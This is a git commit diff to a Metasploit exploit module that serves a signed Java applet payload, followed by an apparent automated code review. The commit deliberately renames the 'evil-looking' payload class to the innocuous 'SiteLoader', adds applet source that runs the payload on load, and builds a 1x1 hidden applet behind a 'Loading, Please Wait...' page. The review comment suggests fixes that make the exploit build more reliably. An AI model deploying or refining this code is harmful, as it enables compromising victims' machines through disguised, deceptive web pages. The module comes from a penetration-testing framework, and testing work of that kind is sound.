move the evil-looking metasploit.PayloadApplet to the more innocuous SiteLoader.class, re-enable rjb compiling for the applet class
git-svn-id: file:///home/svn/framework3/trunk@11249 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
5dd1f52349
commit
05d073c467
|
@ -4,6 +4,9 @@ Created-By: 1.6.0_18 (Sun Microsystems Inc.)
|
|||
Name: metasploit/PayloadApplet.class
|
||||
SHA1-Digest: X/L7jWCXGQGhITfOvpnJg+jgUZM=
|
||||
|
||||
Name: SiteLoader.class
|
||||
SHA1-Digest: /NL9vqsuF9lcRy+blUjLzLc5+ds=
|
||||
|
||||
Name: metasploit/Payload.class
|
||||
SHA1-Digest: KbAIMttBcLp1zCewA2ERYkcnRU8=
|
||||
|
||||
|
|
Binary file not shown.
Binary file not shown.
|
@ -1,11 +1,14 @@
|
|||
Signature-Version: 1.0
|
||||
SHA1-Digest-Manifest-Main-Attributes: s1TdOxe3gzjQrMmw0MCPecT0Dpk=
|
||||
Created-By: 1.6.0_18 (Sun Microsystems Inc.)
|
||||
SHA1-Digest-Manifest: /3/N9PvurH7pif9Ej6Ki35dLu2A=
|
||||
SHA1-Digest-Manifest: dzpmeIPQyYuf152MUqIrDnqVUCc=
|
||||
|
||||
Name: metasploit/PayloadApplet.class
|
||||
SHA1-Digest: y6+heNFX7iv2UtUFv9ziltcUeAs=
|
||||
|
||||
Name: SiteLoader.class
|
||||
SHA1-Digest: 1n6n1EZcQJEmgsVgihkdqUFtyFE=
|
||||
|
||||
Name: metasploit/Payload.class
|
||||
SHA1-Digest: 70nbz45oAy6s9DR1vxQIhIxgzLc=
|
||||
|
||||
|
|
Binary file not shown.
Binary file not shown.
|
@ -43,9 +43,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Author' => [ 'natron' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ],
|
||||
],
|
||||
[
|
||||
[ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ]
|
||||
],
|
||||
'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ],
|
||||
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
|
||||
'Targets' =>
|
||||
|
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Platform' => 'osx',
|
||||
'Arch' => ARCH_X86,
|
||||
}
|
||||
],
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 1
|
||||
))
|
||||
|
@ -87,10 +87,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
OptString.new( 'CERTCN', [ true, "The CN= value for the certificate.", "Metasploit Inc." ]),
|
||||
OptString.new( 'APPLETNAME', [ true, "The main applet's class name.", "SiteLoader" ]),
|
||||
OptString.new('PAYLOADNAME', [ true, "The payload classes name.", "SiteSupport" ]),
|
||||
#OptString.new('PAYLOADNAME', [ true, "The payload classes name.", "SiteSupport" ]),
|
||||
|
||||
# Not implemented yet.
|
||||
#OptString.new('PACKAGENAME', [ true, "The package name for gen'd classes.","x" ]),
|
||||
# Needs Rex::Zip to be able to crack zip files
|
||||
#OptString.new('CUSTOMJAR', [ false, "A custom .jar applet to use.", nil]),
|
||||
], self.class)
|
||||
# No source right now, so don't give an option to save it
|
||||
|
@ -116,6 +117,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_error
|
||||
|
||||
@use_static = true
|
||||
else
|
||||
cp = "#{datastore["JavaCache"]}:" + File.join(Msf::Config.data_directory, "java")
|
||||
compile( [ "#{datastore["APPLETNAME"]}" ] , [ applet_code ], [ "-classpath", "#{cp}" ])
|
||||
applet_file = File.join(datastore["JavaCache"], "#{datastore["APPLETNAME"]}.class")
|
||||
@compiled_applet_data = File.open(applet_file, "rb") { |f| f.read(f.stat.size) }
|
||||
end
|
||||
|
||||
super
|
||||
|
@ -147,16 +153,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# jar, build one for this victim.
|
||||
|
||||
jar = payload.encoded_jar
|
||||
applet_file = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet", "metasploit", "PayloadApplet.class")
|
||||
applet_data = File.open(applet_file, "rb") { |f| f.read(f.stat.size) }
|
||||
|
||||
jar.add_file("metasploit/PayloadApplet.class", applet_data)
|
||||
|
||||
if @use_static
|
||||
# Then build from the statically signed class files. Note that
|
||||
# this uses a pre-compiled version of Payload.class, so any new
|
||||
# updates to that file in the normal javapayload will not be
|
||||
# reflected here!
|
||||
applet_file = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet", "SiteLoader.class")
|
||||
applet_data = File.open(applet_file, "rb") { |f| f.read(f.stat.size) }
|
||||
jar.add_file("SiteLoader.class", applet_data)
|
||||
|
||||
print_status("Building statically signed jar for #{cli.peerhost}")
|
||||
build_static_sig(jar)
|
||||
data = jar.to_s
|
||||
else
|
||||
# Then build from the class file we compiled in the exploit()
|
||||
# method above.
|
||||
jar.add_file("#{datastore["APPLETNAME"]}.class", @compiled_applet_data)
|
||||
print_status("Signing file for #{cli.peerhost}")
|
||||
# The RJB signing class requires the jar to be an actual file on
|
||||
# the filesystem, write it out.
|
||||
|
@ -176,8 +189,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def generate_html
|
||||
html = %Q|<html><head><title>Loading, Please Wait...</title></head> |
|
||||
html += %Q|<body><center><p>Loading, Please Wait...</p></center> |
|
||||
html += %Q|<applet archive="#{datastore["APPLETNAME"]}.jar" |
|
||||
html += %Q| code="metasploit.PayloadApplet" width="1" height="1">\n|
|
||||
html += %Q|<applet archive="#{datastore["APPLETNAME"]}.jar"\n|
|
||||
if @use_static
|
||||
html += %Q| code="SiteLoader" width="1" height="1">\n|
|
||||
else
|
||||
html += %Q| code="#{datastore["APPLETNAME"]}" width="1" height="1">\n|
|
||||
end
|
||||
html += %Q|</applet></body></html>|
|
||||
return html
|
||||
end
|
||||
|
@ -185,9 +202,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def build_static_sig(jar)
|
||||
files = [
|
||||
"metasploit/Payload.class",
|
||||
"metasploit/PayloadApplet.class",
|
||||
"SiteLoader.class",
|
||||
"META-INF/MANIFEST.MF",
|
||||
"META-INF/SIGNFILE.DSA",
|
||||
"META-INF/SIGNFILE.RSA",
|
||||
"META-INF/SIGNFILE.SF",
|
||||
]
|
||||
|
||||
|
@ -222,6 +239,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
jar
|
||||
end
|
||||
|
||||
def applet_code
|
||||
applet = %Q|
|
||||
import java.applet.*;
|
||||
import metasploit.*;
|
||||
|
||||
public class #{datastore["APPLETNAME"]} extends Applet {
|
||||
public void init() {
|
||||
try {
|
||||
Payload.main(null);
|
||||
} catch (Exception ex) {
|
||||
//ex.printStackTrace();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
|
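Review bot: The classpath built in the non-static branch of the `@ -116` hunk hard-codes `:` as the separator (`cp = "#{datastore["JavaCache"]}:" + File.join(...)`), so on a Windows host the JavaCache and data/java entries are glued into one bogus path and `metasploit.Payload` will not resolve when the applet source is compiled; `cp = [datastore["JavaCache"], File.join(Msf::Config.data_directory, "java")].join(File::PATH_SEPARATOR)` is portable. The return value of `compile(...)` (presumably the RJB javac wrapper, not visible here) is never checked, so a compile failure only surfaces as an Errno::ENOENT from the following `File.open`; a guard such as `raise "compile produced no #{applet_file}; check the classpath and APPLETNAME" unless File.file?(applet_file)` gives the operator a usable error. APPLETNAME is interpolated unvalidated into the `public class` declaration in `applet_code`, into the `.class` path under JavaCache, and into the `archive`/`code` attributes in `generate_html`; it is operator-supplied rather than untrusted, but a check like `raise ArgumentError, "APPLETNAME must be a valid Java identifier" unless datastore["APPLETNAME"] =~ /\A[A-Za-z_$][\w$]*\z/` before compiling keeps a stray space or path separator from breaking the build or writing outside the cache directory. The enclosing `exploit` method starts and ends outside the hunk.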